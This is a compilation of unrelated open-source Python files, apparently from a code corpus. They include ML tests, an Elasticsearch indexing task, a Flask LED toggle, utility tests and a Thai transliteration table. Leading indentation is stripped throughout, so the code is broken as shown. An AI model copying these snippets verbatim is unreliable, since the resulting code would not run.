template = """<center>Checklist Question</center> | <center>Examples of Ethical Issues</center>
--- | ---
{lines}
"""
line_template = "**{line_id} {line_summary}**: {line} | {row_text}"
section_title_template = " | <center>**{section_title}**</center>"
line_delimiter = "\n"
formatted_rows = []
for s in cl.sections:
# section title row
row = section_title_template.format(section_title=s.title)
formatted_rows.append(row)
for line in s.lines:
# create bulleted list of links for each checklist item in that section
bulleted_list = []
for link in refs_dict[line.line_id]:
text = link["text"]
url = link["url"]
bullet_hyperlink = f"<li>[{text}]({url})</li>"
bulleted_list.append(bullet_hyperlink)
formatted_bullets = "".join(bulleted_list)
row = line_template.format(
line_id=line.line_id,
line_summary=line.line_summary,
line=line.line,
row_text=f"<ul>{formatted_bullets}</ul>",
)
formatted_rows.append(row)
# bring all the rows together
all_rows = line_delimiter.join(formatted_rows)
return template.format(lines=all_rows)
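# A row emitted by make_table_of_links() looks roughly like the following
# (the identifiers and URLs here are illustrative, not taken from the real checklist):
#   **A.1 Some summary**: Some checklist question | <ul><li>[Example article](https://example.com)</li></ul>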
@click.command()
def main():
ctx = create_context()
for t, o in TEMPLATE_AND_OUTPUT.items():
tmpl = env.get_template(t)
with open(o, "w", encoding="utf-8") as f:
(tmpl.stream(**ctx).dump(f))
if __name__ == "__main__":
main()
|
k2/python/tests/dense_fsa_vec_test.py | EmreOzkose/k2 | 491 | 11087456 | #!/usr/bin/env python3
#
# Copyright 2020 Mobvoi Inc. (authors: <NAME>)
#
# See ../../../LICENSE for clarification regarding multiple authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To run this single test, use
#
# ctest --verbose -R dense_fsa_vec_test_py
import unittest
import k2
import torch
class TestDenseFsaVec(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.devices = [torch.device('cpu')]
if torch.cuda.is_available() and k2.with_cuda:
cls.devices.append(torch.device('cuda', 0))
if torch.cuda.device_count() > 1:
torch.cuda.set_device(1)
cls.devices.append(torch.device('cuda', 1))
def test_dense_fsa_vec(self):
for device in self.devices:
log_prob = torch.arange(20, dtype=torch.float32,
device=device).reshape(
2, 5, 2).log_softmax(dim=-1)
supervision_segments = torch.tensor(
[
# seq_index, start_time, duration
[0, 0, 3],
[0, 1, 4],
[1, 0, 2],
[0, 2, 3],
[1, 3, 2],
],
dtype=torch.int32)
dense_fsa_vec = k2.DenseFsaVec(log_prob, supervision_segments)
assert dense_fsa_vec.dim0() == 5, 'It should contain 5 segments'
assert dense_fsa_vec.device == device
assert dense_fsa_vec.duration.device == torch.device('cpu')
assert torch.all(
torch.eq(dense_fsa_vec.duration, supervision_segments[:, 2]))
del dense_fsa_vec._duration
assert torch.all(
torch.eq(dense_fsa_vec.duration, supervision_segments[:, 2]))
assert torch.allclose(dense_fsa_vec.scores[:3, 1:],
log_prob[0][0:3])
offset = 3 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 4, 1:],
log_prob[0][1:5])
offset += 4 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 2, 1:],
log_prob[1][0:2])
offset += 2 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 3, 1:],
log_prob[0][2:5])
offset += 3 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 2, 1:],
log_prob[1][3:5])
dense_fsa_vec.to('cpu')
def test_duration(self):
for device in self.devices:
log_prob = torch.arange(20, dtype=torch.float32,
device=device).reshape(
2, 5, 2).log_softmax(dim=-1)
supervision_segments = torch.tensor(
[
# seq_index, start_time, duration
[0, 0, 3],
[0, 4, 2], # exceed 1
[0, 3, 4], # exceed 2
[1, 1, 7], # exceed 3
],
dtype=torch.int32)
dense_fsa_vec = k2.DenseFsaVec(log_prob,
supervision_segments,
allow_truncate=3)
assert torch.all(
torch.eq(dense_fsa_vec.duration, torch.tensor([3, 1, 2, 4])))
assert torch.allclose(dense_fsa_vec.scores[:3, 1:],
log_prob[0][0:3])
offset = 3 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 1, 1:],
log_prob[0][4:5])
offset += 1 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 2, 1:],
log_prob[0][3:5])
offset += 2 + 1
assert torch.allclose(dense_fsa_vec.scores[offset:offset + 4, 1:],
log_prob[1][1:5])
dense_fsa_vec.to('cpu')
if __name__ == '__main__':
unittest.main()
|
exampleSite/algolia-index-upload.py | timatlee/bilberry-hugo-theme | 274 | 11087487 | <reponame>timatlee/bilberry-hugo-theme
import argparse
import json
from algoliasearch.search_client import SearchClient
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--index-file', help="Index file to upload to Algolia")
parser.add_argument('-a', '--app-id', help="Algolia application ID")
parser.add_argument('-k', '--admin-api-key', help="Algolia admin API key")
parser.add_argument('-n', '--index-name', help="Algolia index name")
args = parser.parse_args()
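# Example invocation (all values are placeholders):
#   python algolia-index-upload.py -f public/index.json -a MY_APP_ID -k MY_ADMIN_KEY -n my-index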
with open(args.index_file, 'r') as file:
indices_json = file.read().replace('\n', '')
indices = json.loads(indices_json)
client = SearchClient.create(args.app_id, args.admin_api_key)
index = client.init_index(args.index_name)
index.save_objects(indices)
|
src/test/tests/queries/revolved_surface_area.py | visit-dav/vis | 226 | 11087510 | <filename>src/test/tests/queries/revolved_surface_area.py
# ----------------------------------------------------------------------------
# CLASSES: nightly
#
# Test Case: revolved_surface_area.py
# Tests: queries - Revolved surface area of 2D plot.
#
# Defect ID: VisIt00004666, '3260, '3261
#
# Programmer: <NAME>
# Date: March 30, 2004
#
# Modifications:
# <NAME>, Thu Apr 29 07:40:58 PDT 2004
# Slice defaults atts have changed, update accordingly.
#
# <NAME>, Thu Jan 12 15:57:52 PST 2006
# Added additional tests ('3260, '3261).
#
# <NAME>, Wed Jan 20 07:37:11 PST 2010
# Added ability to switch between Silo's HDF5 and PDB data.
# ----------------------------------------------------------------------------
# Test for topological dimension 2.
TurnOnAllAnnotations()
OpenDatabase(silo_data_path("rect2d.silo"))
AddPlot("Pseudocolor", "d")
DrawPlots()
Query("Revolved surface area")
text = GetQueryOutputString()
TestText("revolved_surface_area_01", text)
# Test with isosurface operator.
DeleteAllPlots()
AddPlot("Pseudocolor", "d")
AddOperator("Isosurface")
iso_atts = IsosurfaceAttributes();
iso_atts.contourValue = (.25)
iso_atts.contourMethod = iso_atts.Value
SetOperatorOptions(iso_atts)
DrawPlots()
Query("Revolved surface area")
text = GetQueryOutputString()
TestText("revolved_surface_area_02", text)
# Test for boundary plot.
DeleteAllPlots()
AddPlot("Boundary", "mat1")
DrawPlots()
Query("Revolved surface area")
text = GetQueryOutputString()
TestText("revolved_surface_area_03", text)
# Test with 3D, isosurface, slice.
DeleteAllPlots()
OpenDatabase(silo_data_path("rect3d.silo"))
AddPlot("Pseudocolor", "d")
AddOperator("Isosurface")
SetOperatorOptions(iso_atts)
AddOperator("Slice")
s = SliceAttributes()
s.originIntercept = 0.5
s.axisType = s.YAxis
SetOperatorOptions(s)
DrawPlots()
Query("Revolved surface area")
text = GetQueryOutputString()
TestText("revolved_surface_area_04", text)
RemoveLastOperator()
Query("Revolved surface area")
text = GetLastError()
TestText("revolved_surface_area_05", text)
Exit()
|
databuilder/databuilder/task/search/search_metadata_to_elasticsearch_task.py | kokizzu/amundsen | 1,169 | 11087535 | <gh_stars>1000+
# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import logging
from datetime import date
from typing import (
Any, Generator, List,
)
from uuid import uuid4
from elasticsearch.exceptions import NotFoundError
from elasticsearch.helpers import parallel_bulk
from elasticsearch_dsl.connections import Connections, connections
from elasticsearch_dsl.document import Document
from elasticsearch_dsl.index import Index
from pyhocon import ConfigTree
from databuilder import Scoped
from databuilder.extractor.base_extractor import Extractor
from databuilder.task.base_task import Task
from databuilder.task.search.document_mappings import RESOURCE_TO_MAPPING, SearchableResource
from databuilder.transformer.base_transformer import NoopTransformer, Transformer
from databuilder.utils.closer import Closer
LOGGER = logging.getLogger(__name__)
class SearchMetadatatoElasticasearchTask(Task):
ENTITY_TYPE = 'doc_type'
ELASTICSEARCH_CLIENT_CONFIG_KEY = 'client'
MAPPING_CLASS = 'document_mapping'
ELASTICSEARCH_ALIAS_CONFIG_KEY = 'alias'
ELASTICSEARCH_NEW_INDEX = 'new_index'
ELASTICSEARCH_PUBLISHER_BATCH_SIZE = 'batch_size'
ELASTICSEARCH_TIMEOUT_SEC = 'es_timeout_sec'
DATE = 'date'
today = date.today().strftime("%Y%m%d")
def __init__(self,
extractor: Extractor,
transformer: Transformer = NoopTransformer()) -> None:
self.extractor = extractor
self.transformer = transformer
self._closer = Closer()
self._closer.register(self.extractor.close)
self._closer.register(self.transformer.close)
def init(self, conf: ConfigTree) -> None:
        # initialize extractor with configuration
self.extractor.init(Scoped.get_scoped_conf(conf, self.extractor.get_scope()))
# initialize transformer with configuration
self.transformer.init(Scoped.get_scoped_conf(conf, self.transformer.get_scope()))
# task configuration
conf = Scoped.get_scoped_conf(conf, self.get_scope())
self.date = conf.get_string(SearchMetadatatoElasticasearchTask.DATE, self.today)
self.entity = conf.get_string(SearchMetadatatoElasticasearchTask.ENTITY_TYPE).lower()
self.elasticsearch_client = conf.get(
SearchMetadatatoElasticasearchTask.ELASTICSEARCH_CLIENT_CONFIG_KEY
)
self.elasticsearch_alias = conf.get(
SearchMetadatatoElasticasearchTask.ELASTICSEARCH_ALIAS_CONFIG_KEY
)
self.elasticsearch_new_index = conf.get(
SearchMetadatatoElasticasearchTask.ELASTICSEARCH_NEW_INDEX,
self.create_new_index_name())
self.document_mapping = conf.get(SearchMetadatatoElasticasearchTask.MAPPING_CLASS,
RESOURCE_TO_MAPPING[self.entity])
if not issubclass(self.document_mapping, SearchableResource):
msg = "Provided document_mapping should be instance" \
f" of SearchableResource not {type(self.document_mapping)}"
LOGGER.error(msg)
raise TypeError(msg)
self.elasticsearch_batch_size = conf.get(
SearchMetadatatoElasticasearchTask.ELASTICSEARCH_PUBLISHER_BATCH_SIZE, 10000
)
self.elasticsearch_timeout_sec = conf.get(
SearchMetadatatoElasticasearchTask.ELASTICSEARCH_TIMEOUT_SEC, 120
)
def create_new_index_name(self) -> str:
hex_string = uuid4().hex
return f"{self.elasticsearch_alias}_{self.date}_{hex_string}"
def to_document(self, metadata: Any) -> Document:
return self.document_mapping(_index=self.elasticsearch_new_index,
**metadata)
def generate_documents(self, record: Any) -> Generator:
# iterate through records
while record:
record = self.transformer.transform(record)
if not record:
# Move on if the transformer filtered the record out
record = self.extractor.extract()
continue
document = self.to_document(metadata=record).to_dict(True)
document['_source']['resource_type'] = self.entity
yield document
record = self.extractor.extract()
def _get_old_index(self, connection: Connections) -> List[str]:
"""
Retrieve all indices that currently have {elasticsearch_alias} alias
:return: list of elasticsearch indices
"""
try:
indices = connection.indices.get_alias(self.elasticsearch_alias).keys()
return indices
except NotFoundError:
LOGGER.warn("Received index not found error from Elasticsearch. " +
"The index doesn't exist for a newly created ES. It's OK on first run.")
# return empty list on exception
return []
def _delete_old_index(self, connection: Connections, document_index: Index) -> None:
alias_updates = []
previous_index = self._get_old_index(connection=connection)
for previous_index_name in previous_index:
if previous_index_name != document_index._name:
LOGGER.info(f"Deleting old index {previous_index_name}")
alias_updates.append({"remove_index": {"index": previous_index_name}})
alias_updates.append({"add": {
"index": self.elasticsearch_new_index,
"alias": self.elasticsearch_alias}})
connection.indices.update_aliases({"actions": alias_updates})
def run(self) -> None:
LOGGER.info('Running search metadata to Elasticsearch task')
try:
# extract records from metadata store
record = self.extractor.extract()
# create connection
connections.add_connection('default', self.elasticsearch_client)
connection = connections.get_connection()
# health check ES
health = connection.cluster.health()
status = health["status"]
if status not in ("green", "yellow"):
msg = f"Elasticsearch healthcheck failed: {status}"
LOGGER.error(msg)
raise Exception(msg)
# create index
LOGGER.info(f"Creating ES index {self.elasticsearch_new_index}")
index = Index(name=self.elasticsearch_new_index, using=self.elasticsearch_client)
index.document(self.document_mapping)
index.create()
# publish search metadata to ES
cnt = 0
for success, info in parallel_bulk(connection,
self.generate_documents(record=record),
raise_on_error=False,
chunk_size=self.elasticsearch_batch_size,
request_timeout=self.elasticsearch_timeout_sec):
if not success:
LOGGER.warn(f"There was an error while indexing a document to ES: {info}")
else:
cnt += 1
                    if cnt % self.elasticsearch_batch_size == 0:
                        LOGGER.info(f'Published {cnt} records to ES')
# delete old index
self._delete_old_index(connection=connection,
document_index=index)
LOGGER.info("Elasticsearch Indexing completed")
finally:
self._closer.close()
def get_scope(self) -> str:
return 'task.search_metadata_to_elasticsearch'
|
test/test_detect_secrets.py | trae-horton/secret-bridge | 152 | 11087537 | import unittest
from detectors.detectsecrets import DetectSecrets
class AttrDict(dict):
"""A hacky dictionary that exposes its members as attributes.
Ex: attr_dict['foo'] == attr_dict.foo
This is to mimic the way that decoded JSON objects look (i.e. JSON
    object fields are exposed as attributes).
"""
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
class TestDetectSecrets(unittest.TestCase):
TEST_INPUT = """my_secret_key = "<KEY>"\n"""
TEST_JSON_OUTPUT_SUBSET = """"results": {
"foo.txt": [
{
"hashed_secret": "a6846d8320dcb082eba8ab9612f8fd1df7e4a345",
"line_number": 1,
"type": "Hex High Entropy String"
}
]
}
}"""
def test_parse_example_output(self):
ds = DetectSecrets()
file_obj = AttrDict({
"filename": "secret_test.txt",
"patch": self.TEST_INPUT
})
out = ds.run('tmp_path', file_obj)
self.assertEqual(len(out), 1)
finding = out[0]
self.assertEqual(finding.secret_type, "Hex High Entropy String")
|
thrift_tools/tests/test_file_reader.py | cbweixin/thrift-tools | 222 | 11087549 | <gh_stars>100-1000
from collections import namedtuple
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import unittest
from thrift_tools.file_reader import run
from .util import get_log_path
PARAMS = [
'file',
'padding',
'protocol',
'structs',
'finagle_thrift',
'skip_values',
'pretty',
'max_messages',
'debug',
'show_holes'
]
PARAM_NAMES = ' '.join(PARAMS)
class Params(namedtuple('Params', PARAM_NAMES)):
pass
class FileReaderTestCase(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_read_structs(self):
params = Params(
file=get_log_path('structs'),
padding=0,
protocol='binary',
structs=True,
finagle_thrift=False, # ignored when structs
skip_values=False,
pretty=True,
max_messages=0,
debug=False,
show_holes=False
)
output = StringIO()
run(params, output)
self.assertIn("'field_type': 'i32', 'value': 1", output.getvalue())
def test_read_messages(self):
params = Params(
file=get_log_path('messages'),
padding=0,
protocol='binary',
structs=False,
finagle_thrift=False,
skip_values=False,
pretty=True,
max_messages=0,
debug=False,
show_holes=False
)
output = StringIO()
run(params, output)
self.assertIn('ping', output.getvalue())
self.assertIn('search', output.getvalue())
self.assertIn('reply', output.getvalue())
|
datadog_checks_base/tests/test_utils.py | vbarbaresi/integrations-core | 663 | 11087552 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from decimal import ROUND_HALF_DOWN
import mock
import pytest
from six import PY2, PY3
from datadog_checks.base.utils.common import ensure_bytes, ensure_unicode, pattern_filter, round_value, to_native_string
from datadog_checks.base.utils.containers import hash_mutable, iter_unique
from datadog_checks.base.utils.limiter import Limiter
from datadog_checks.base.utils.secrets import SecretsSanitizer
class Item:
def __init__(self, name):
self.name = name
def __eq__(self, other):
return self.name == other.name
class TestPatternFilter:
def test_no_items(self):
items = []
whitelist = ['mock']
assert pattern_filter(items, whitelist=whitelist) == []
def test_no_patterns(self):
items = ['mock']
assert pattern_filter(items) is items
def test_multiple_matches_whitelist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist) == ['abc', 'def', 'abcdef']
def test_multiple_matches_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
blacklist = ['abc', 'def']
assert pattern_filter(items, blacklist=blacklist) == ['ghi']
def test_whitelist_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['def']
blacklist = ['abc']
assert pattern_filter(items, whitelist=whitelist, blacklist=blacklist) == ['def']
def test_key_function(self):
items = [Item('abc'), Item('def'), Item('abcdef'), Item('ghi')]
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist, key=lambda item: item.name) == [
Item('abc'),
Item('def'),
Item('abcdef'),
]
class TestLimiter:
def test_no_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 10):
assert limiter.is_reached() is False
assert limiter.get_status() == (10, 10, False)
# Reach limit
assert limiter.is_reached() is True
assert limiter.get_status() == (11, 10, True)
# Make sure warning is only sent once
assert limiter.is_reached() is True
warning.assert_called_once_with("Check %s exceeded limit of %s %s, ignoring next ones", "my_check", 10, "names")
def test_with_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 20):
assert limiter.is_reached("dummy2") is False
assert limiter.get_status() == (2, 10, False)
warning.assert_not_called()
def test_mixed(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 5):
assert limiter.is_reached() is False
assert limiter.get_status() == (6, 10, False)
def test_reset(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(1, 20):
limiter.is_reached("dummy1")
assert limiter.get_status() == (1, 10, False)
limiter.reset()
assert limiter.get_status() == (0, 10, False)
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
class TestRounding:
def test_round_half_up(self):
assert round_value(3.5) == 4.0
def test_round_modify_method(self):
assert round_value(3.5, rounding_method=ROUND_HALF_DOWN) == 3.0
def test_round_modify_sig_digits(self):
assert round_value(2.555, precision=2) == 2.560
assert round_value(4.2345, precision=2) == 4.23
assert round_value(4.2345, precision=3) == 4.235
class TestContainers:
def test_iter_unique(self):
custom_queries = [
{
'metric_prefix': 'database',
'tags': ['test:database'],
'query': 'SELECT thing1, thing2 FROM TABLE',
'columns': [{'name': 'database.metric', 'type': 'count'}, {'name': 'tablespace', 'type': 'tag'}],
},
{
'tags': ['test:database'],
'columns': [{'name': 'tablespace', 'type': 'tag'}, {'name': 'database.metric', 'type': 'count'}],
'query': 'SELECT thing1, thing2 FROM TABLE',
'metric_prefix': 'database',
},
]
assert len(list(iter_unique(custom_queries))) == 1
@pytest.mark.parametrize(
'value',
[
pytest.param({'x': 'y'}, id='dict'),
pytest.param({'x': 'y', 'z': None}, id='dict-with-none-value'),
pytest.param({'x': 'y', None: 't'}, id='dict-with-none-key'),
pytest.param({'x': ['y', 'z'], 't': 'u'}, id='dict-nest-list'),
pytest.param(['x', 'y'], id='list'),
pytest.param(['x', None], id='list-with-none'),
pytest.param(('x', None), id='tuple-with-none'),
pytest.param({'x', None}, id='set-with-none'),
],
)
def test_hash_mutable(self, value):
h = hash_mutable(value)
assert isinstance(h, int)
@pytest.mark.skipif(
PY2,
reason="In Python 2, a < b when a and b are of different types returns `False` (does not raise `TypeError`)",
)
@pytest.mark.parametrize(
'value',
[
pytest.param(['x', 1], id='mixed-list'),
pytest.param(['x', [1, 2, 3]], id='mixed-list-nested-1'),
pytest.param(['x', {'y': 'z'}], id='mixed-list-nested-2'),
pytest.param(('x', 1), id='mixed-tuple'),
pytest.param({'x', 1}, id='mixed-set'),
pytest.param({'x': 1, 2: 'y'}, id='mixed-dict-keys'),
],
)
def test_hash_mutable_unsupported_mixed_type(self, value):
"""
Hashing mixed type containers is not supported, mostly because we haven't needed to add support for it yet.
"""
with pytest.raises(TypeError):
hash_mutable(value)
@pytest.mark.parametrize(
'left, right',
[
pytest.param([1, 2], [2, 1], id='top-level'),
pytest.param({'x': [1, 2]}, {'x': [2, 1]}, id='nested'),
],
)
def test_hash_mutable_commutative(self, left, right):
"""
hash_mutable() is expected to return the same hash regardless of the order of items in the container.
"""
assert hash_mutable(left) == hash_mutable(right)
class TestBytesUnicode:
@pytest.mark.skipif(PY3, reason="Python 3 does not support explicit bytestring with special characters")
def test_ensure_bytes_py2(self):
assert ensure_bytes('éâû') == 'éâû'
assert ensure_bytes(u'éâû') == 'éâû'
def test_ensure_bytes(self):
assert ensure_bytes('qwerty') == b'qwerty'
def test_ensure_unicode(self):
assert ensure_unicode('éâû') == u'éâû'
assert ensure_unicode(u'éâû') == u'éâû'
def test_to_native_string(self):
# type: () -> None
text = u'éâû'
binary = text.encode('utf-8')
if PY3:
assert to_native_string(binary) == text
else:
assert to_native_string(binary) == binary
class TestSecretsSanitizer:
def test_default(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
assert sanitizer.sanitize(secret) == secret
def test_sanitize(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
sanitizer.register(secret)
assert all(letter == '*' for letter in sanitizer.sanitize(secret))
def test_sanitize_multiple(self):
# type: () -> None
pwd1 = '<PASSWORD>'
pwd2 = '<PASSWORD>'
sanitizer = SecretsSanitizer()
sanitizer.register(pwd1)
sanitizer.register(pwd2)
message = 'Could not authenticate with password {}, did you try {}?'.format(pwd1, pwd2)
sanitized = sanitizer.sanitize(message)
assert pwd1 not in sanitized
assert pwd2 not in sanitized
|
aiida/storage/psql_dos/migrations/versions/django_0032_remove_legacy_workflows.py | mkrack/aiida-core | 153 | 11087573 | <reponame>mkrack/aiida-core
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# pylint: disable=invalid-name,no-member
"""Remove legacy workflows
This is similar to migration 1b8ed3425af9
Revision ID: django_0032
Revises: django_0031
"""
from alembic import op
from aiida.storage.psql_dos.migrations.utils.legacy_workflows import export_workflow_data
revision = 'django_0032'
down_revision = 'django_0031'
branch_labels = None
depends_on = None
def upgrade():
"""Migrations for the upgrade."""
# Clean data
export_workflow_data(op.get_bind(), op.get_context().opts['aiida_profile'])
# drop tables (indexes are also automatically dropped)
op.drop_table('db_dbworkflowstep_sub_workflows')
op.drop_table('db_dbworkflowstep_calculations')
op.drop_table('db_dbworkflowstep')
op.drop_table('db_dbworkflowdata')
op.drop_table('db_dbworkflow')
def downgrade():
"""Migrations for the downgrade."""
raise NotImplementedError('Downgrade of django_0032.')
|
utils/fasm/test/make_blif.py | brycejh/vtr-verilog-to-routing | 682 | 11087576 | #!/usr/bin/env python3
"""
This is an utility script that generates a BLIF file with arbitrary number of
5 and 6 input LUTs. Along with LUTs their initialization content is placed
in a comment just before the '.names' directive.
"""
import random
def main():
lut_count = 35
print('.model top')
print('.inputs ' + ' '.join(['di{}'.format(i) for i in range(6)]))
print('.outputs ' + ' '.join(['do{}'.format(i) for i in range(lut_count)]))
for i in range(lut_count):
n = random.choice((5, 6))
ones = set([''.join([random.choice('01') for i in range(n)]) for j in range(2**n)])
init = 0
for one in ones:
idx = 0
for j, c in enumerate(one):
if c == '1':
idx |= (1 << (len(one)-1-j))
init |= 1 << idx
init_str = ''.join(['1' if init & (1<<j) else '0' for j in reversed(range(2**n))])
print('# {}\'b{}'.format(2**n, init_str))
print('.names ' + ' '.join(['di{}'.format(j) for j in range(n)]) + ' do{} '.format(i))
for one in ones:
print('{} 1'.format(one))
if __name__ == "__main__":
main()
|
Raspberry-Pi-Sonoff/Main.py | Aishwary912/Raspberry-Pi-Sonoff | 269 | 11087619 | <gh_stars>100-1000
from flask import Flask, render_template, request, redirect
from gpiozero import LED
from time import sleep
led = LED(2)
app = Flask(__name__)
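# The routes below can be exercised from any machine on the network, e.g.:
#   curl http://<pi-address>:8000/      -> status page
#   curl http://<pi-address>:8000/on    -> turns the GPIO2 pin on
#   curl http://<pi-address>:8000/off   -> turns it off
# (<pi-address> is a placeholder for the Raspberry Pi's IP.)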
@app.route("/")
def home():
if led.value == 1:
status = 'ON'
else:
status = 'OFF'
return render_template('home.html', status=status)
@app.route("/on")
def on():
led.on()
return "LED on"
@app.route("/off")
def off():
led.off()
return "LED off"
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8000)
|
tests/garage/tf/algos/test_reps.py | blacksph3re/garage | 1,500 | 11087634 | <filename>tests/garage/tf/algos/test_reps.py
"""
This script creates a test that fails when garage.tf.algos.REPS performance is
too low.
"""
import pytest
from garage.envs import GymEnv
from garage.np.baselines import LinearFeatureBaseline
from garage.sampler import LocalSampler
from garage.tf.algos import REPS
from garage.tf.policies import CategoricalMLPPolicy
from garage.trainer import TFTrainer
from tests.fixtures import snapshot_config, TfGraphTestCase
class TestREPS(TfGraphTestCase):
@pytest.mark.large
def test_reps_cartpole(self):
"""Test REPS with gym Cartpole environment."""
with TFTrainer(snapshot_config, sess=self.sess) as trainer:
env = GymEnv('CartPole-v0')
policy = CategoricalMLPPolicy(env_spec=env.spec,
hidden_sizes=[32, 32])
baseline = LinearFeatureBaseline(env_spec=env.spec)
sampler = LocalSampler(
agents=policy,
envs=env,
max_episode_length=env.spec.max_episode_length,
is_tf_worker=True)
algo = REPS(env_spec=env.spec,
policy=policy,
baseline=baseline,
sampler=sampler,
discount=0.99)
trainer.setup(algo, env)
last_avg_ret = trainer.train(n_epochs=10, batch_size=4000)
assert last_avg_ret > 5
env.close()
|
test_proj/blog/forms.py | Ivan-Feofanov/django-inline-actions | 204 | 11087645 | <reponame>Ivan-Feofanov/django-inline-actions
from django import forms
from . import models
class ChangeTitleForm(forms.ModelForm):
class Meta:
model = models.Article
fields = ('title',)
|
vnpy/api/femas/__init__.py | funrunskypalace/vnpy | 19,529 | 11087653 | <filename>vnpy/api/femas/__init__.py<gh_stars>1000+
from .vnfemasmd import MdApi
from .vnfemastd import TdApi
from .femas_constant import * |
docs/demos/multi_page_meta_tags/app.py | ruxi/dash-labs | 110 | 11087655 | <filename>docs/demos/multi_page_meta_tags/app.py
from dash import Dash, html, dcc
import dash
import dash_labs as dl
app = Dash(__name__, plugins=[dl.plugins.pages])
app.layout = html.Div(
[
html.H1("App Frame"),
html.Div(
[
html.Div(
[
html.Img(
src=app.get_asset_url(page["image"]),
height="40px",
width="60px",
),
dcc.Link(f"{page['name']} - {page['path']}", href=page["path"]),
],
style={"margin": 20},
)
for page in dash.page_registry.values()
]
),
dl.plugins.page_container,
]
)
if __name__ == "__main__":
app.run_server(debug=True)
|
pythainlp/transliterate/royin.py | wannaphongcom/pythai-nlp | 125 | 11087669 | <reponame>wannaphongcom/pythai-nlp
# -*- coding: utf-8 -*-
"""
The Royal Thai General System of Transcription (RTGS)
is the official system for rendering Thai words in the Latin alphabet.
It was published by the Royal Institute of Thailand.
:See Also:
* `Wikipedia <https://en.wikipedia.org/wiki/Royal_Thai_General_System_of_Transcription>`_
"""
import re
from pythainlp import thai_consonants, word_tokenize
# vowel
_vowel_patterns = """เ*ียว,\\1iao
แ*็ว,\\1aeo
เ*ือย,\\1ueai
แ*ว,\\1aeo
เ*็ว,\\1eo
เ*ว,\\1eo
*ิว,\\1io
*วย,\\1uai
เ*ย,\\1oei
*อย,\\1oi
โ*ย,\\1oi
*ุย,\\1ui
*าย,\\1ai
ไ*ย,\\1ai
*ัย,\\1ai
ไ**,\\1\\2ai
ไ*,\\1ai
ใ*,\\1ai
*ว*,\\1ua\\2
*ัวะ,\\1ua
*ัว,\\1ua
เ*ือะ,\\1uea
เ*ือ,\\1uea
เ*ียะ,\\1ia
เ*ีย,\\1ia
เ*อะ,\\1oe
เ*อ,\\1oe
เ*ิ,\\1oe
*อ,\\1o
เ*าะ,\\1o
เ*็,\\1e
โ*ะ,\\1o
โ*,\\1o
แ*ะ,\\1ae
แ*,\\1ae
เ*าะ,\\1e
*าว,\\1ao
เ*า,\\1ao
เ*,\\1e
*ู,\\1u
*ุ,\\1u
*ื,\\1ue
*ึ,\\1ue
*ี,\\1i
*ิ,\\1i
*ำ,\\1am
*า,\\1a
*ั,\\1a
*ะ,\\1a
#ฤ,\\1rue
$ฤ,\\1ri"""
_vowel_patterns = _vowel_patterns.replace("*", f"([{thai_consonants}])")
_vowel_patterns = _vowel_patterns.replace("#", "([คนพมห])")
_vowel_patterns = _vowel_patterns.replace("$", "([กตทปศส])")
_VOWELS = [x.split(",") for x in _vowel_patterns.split("\n")]
# Consonant map: Thai consonant -> [initial sound, final sound]
_CONSONANTS = {
"ก": ["k", "k"],
"ข": ["kh", "k"],
"ฃ": ["kh", "k"],
"ค": ["kh", "k"],
"ฅ": ["kh", "k"],
"ฆ": ["kh", "k"],
"ง": ["ng", "ng"],
"จ": ["ch", "t"],
"ฉ": ["ch", "t"],
"ช": ["ch", "t"],
"ซ": ["s", "t"],
"ฌ": ["ch", "t"],
"ญ": ["y", "n"],
"ฎ": ["d", "t"],
"ฏ": ["t", "t"],
"ฐ": ["th", "t"],
    # ฑ as an initial consonant can also be "d"
"ฑ": ["th", "t"],
"ฒ": ["th", "t"],
"ณ": ["n", "n"],
"ด": ["d", "t"],
"ต": ["t", "t"],
"ถ": ["th", "t"],
"ท": ["th", "t"],
"ธ": ["th", "t"],
"น": ["n", "n"],
"บ": ["b", "p"],
"ป": ["p", "p"],
"ผ": ["ph", "p"],
